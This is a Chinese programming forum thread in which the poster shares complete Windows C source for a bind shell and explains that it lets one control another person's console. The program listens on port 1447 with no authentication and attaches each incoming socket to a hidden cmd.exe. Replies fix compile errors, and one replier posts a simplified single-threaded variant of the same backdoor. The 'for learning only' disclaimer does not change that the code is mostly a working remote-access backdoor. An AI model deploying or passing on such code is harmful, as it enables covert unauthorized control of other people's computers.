0管道 CMD远程登录。

无名侠

原理是把Socket套接字句柄作为子进程的stdin、stdout、stderr管道。
要实现这一步必须用WSASocket创建套接字。 不用创建管道，省区许多麻烦事儿。

上一张用Telnet连接的图吧。

仅供学习~不要干坏事哦。

@漩涡鸣人 @kklloo @～风介～ @牡丹花下死做鬼  

1. // ScoketPip.cpp : 定义应用程序的入口点。
   
2. //
   
3. 
   
4. #include "stdafx.h"
   
5. #include "ScoketPip.h"
   
6. #include <WinSock2.h>
   
7. #pragma comment(lib,"ws2_32.lib")
   
8. typedef struct
   
9. {
   
10.         SOCKET childFd;
    
11.         SOCKADDR_IN childaddr;
    
12.         DWORD thread_id;
    
13. }WorkInfo;
    
14. DWORD WINAPI thread_worker(PVOID Parm)
    
15. {
    
16.         // 这是工作线程函数
    
17.         WorkInfo info1;
    
18.         PROCESS_INFORMATION pi={0};
    
19.         STARTUPINFOA si={0};
    
20.         memcpy(&info1,Parm,sizeof(WorkInfo));
    
21.         // 创建进程
    
22.         si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    
23.         si.wShowWindow = SW_HIDE;
    
24.         si.hStdInput = si.hStdOutput = si.hStdError = (void *)info1.childFd;
    
25.         char *welcome = "远程CMD\n作者:无名侠\n主页：www.pandaos.net\n";
    
26.         send(info1.childFd,welcome,strlen(welcome)+1,0);
    
27.         DWORD ret=CreateProcessA(NULL,"cmd.exe",
    
28.                 NULL,NULL,1,0,NULL,NULL,&si,&pi);
    
29.         if (!ret)
    
30.         {
    
31.                 char *error = "无法访问cmd.exe\n连接失败...\n";
    
32.                 send(info1.childFd,error,strlen(error)+1,0);
    
33.         }
    
34.        
    
35.        
    
36.         closesocket(info1.childFd);
    
37. 
    
38.         // 销毁
    
39.         return ret;
    
40. }
    
41. int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
    
42.                      _In_opt_ HINSTANCE hPrevInstance,
    
43.                      _In_ LPTSTR    lpCmdLine,
    
44.                      _In_ int       nCmdShow)
    
45. {
    
46.         WSADATA wd={0};
    
47.         SOCKET sock;
    
48.         SOCKADDR_IN sockaddr={0};
    
49.         WSAStartup(MAKEWORD(2,2),&wd);
    
50.         sock = WSASocket(AF_INET, SOCK_STREAM,
    
51.                 IPPROTO_TCP, NULL, 0, 0);
    
52.         if (sock==INVALID_SOCKET)
    
53.                 ExitProcess(-1);
    
54.         sockaddr.sin_family = AF_INET;
    
55.         sockaddr.sin_port=htons(1447);
    
56.         sockaddr.sin_addr.S_un.S_addr=ADDR_ANY;
    
57.         if(bind(sock,(SOCKADDR *)&sockaddr,sizeof(sockaddr)))
    
58.                 ExitProcess(-2);
    
59.         if(listen(sock,5))
    
60.                 ExitProcess(-3);
    
61.         // 为每个用户运行一个cmd控制台
    
62.         while (true)
    
63.         {
    
64.                 WorkInfo newwork;
    
65.                 int slen;
    
66.                 slen = sizeof(SOCKADDR_IN);
    
67.                 newwork.childFd=accept(sock,(SOCKADDR *)&newwork.childaddr,&slen);
    
68.                 if (newwork.childFd!=INVALID_SOCKET)
    
69.                 {
    
70.                         HANDLE hThread;
    
71.                         hThread = CreateThread(NULL,0,thread_worker,&newwork,0,&newwork.thread_id);
    
72.                         CloseHandle(hThread);
    
73.                 }
    
74.                 Sleep(200);
    
75.         }
    
76. }

复制代码

牡丹花下死做鬼

表示 暂时完全不知道你写了什么

无名侠

牡丹花下死做鬼 发表于 2015-7-12 12:52
表示 暂时完全不知道你写了什么

这个可以操控别人电脑上的控制台。
操作的时候就想在操作自己电脑的控制台一样，

～风介～

编译器报错说没有这两个头文件：

1. #include "stdafx.h"
   
2. #include "ScoketPip.h"

复制代码

看来我还是搞不懂具体的步骤啊~

无名侠

～风介～ 发表于 2015-7-12 19:04
编译器报错说没有这两个头文件：

看来我还是搞不懂具体的步骤啊~

去掉就行了。

无名侠

～风介～ 发表于 2015-7-12 19:04
编译器报错说没有这两个头文件：

看来我还是搞不懂具体的步骤啊~

有点懒，每次都让vc自动导入头文件。
#include <windows.h> 记得加上。

爱你一辈子

刷点鱼币 只为下载 路过

xintiandi

请教楼主一个问题，我用telnet运行一些命令不起作用，但是在cmd下就可以，同一台主机。

sakana

感谢楼主，我这里稍微整理了一下，改成单线程的看的清楚有需要再改成多线程的。

1. /**
   
2. * TelNet服务端
   
3. * @by skn
   
4. */
   
5. #include <winsock2.h>
   
6. #pragma comment(lib,"ws2_32.lib")
   
7. 
   
8. int main(char *argc,char *argv[])
   
9. {
   
10.     WSADATA wsaData;
    
11.     WORD sockVersion = MAKEWORD(2,2);
    
12.     WSAStartup(sockVersion,&wsaData);
    
13. 
    
14.     //SOCKET s = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    
15.     SOCKET s = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
    
16.     if(s == INVALID_SOCKET)
    
17.     {
    
18.         return -1;
    
19.     }
    
20. 
    
21.     sockaddr_in sin;
    
22.     sin.sin_family = AF_INET;
    
23.     sin.sin_port = htons(1447);
    
24.     sin.sin_addr.S_un.S_addr = INADDR_ANY;
    
25.     if(bind(s,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
    
26.     {
    
27.         return -1;
    
28.     }
    
29. 
    
30.     if(listen(s,SOMAXCONN) == SOCKET_ERROR)
    
31.     {
    
32.         return -1;
    
33.     }
    
34. 
    
35.     while(true)
    
36.     {
    
37.         sockaddr_in remoteAddr;
    
38.         int nAddrLen = sizeof(sockaddr_in);
    
39.         SOCKET client = accept(s,(SOCKADDR*)&remoteAddr,&nAddrLen);
    
40.         if(client == INVALID_SOCKET)
    
41.         {
    
42.             continue;
    
43.         }
    
44. 
    
45.         PROCESS_INFORMATION pi = {0};
    
46.         STARTUPINFOA si = {0};
    
47.         si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    
48.         si.wShowWindow = SW_HIDE;
    
49.         si.hStdInput = si.hStdOutput = si.hStdError = (void *)client;
    
50.         CreateProcessA(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&pi);
    
51.         closesocket(client);
    
52.     }
    
53. 
    
54.     WSACleanup();
    
55.     return 1;
    
56. }

复制代码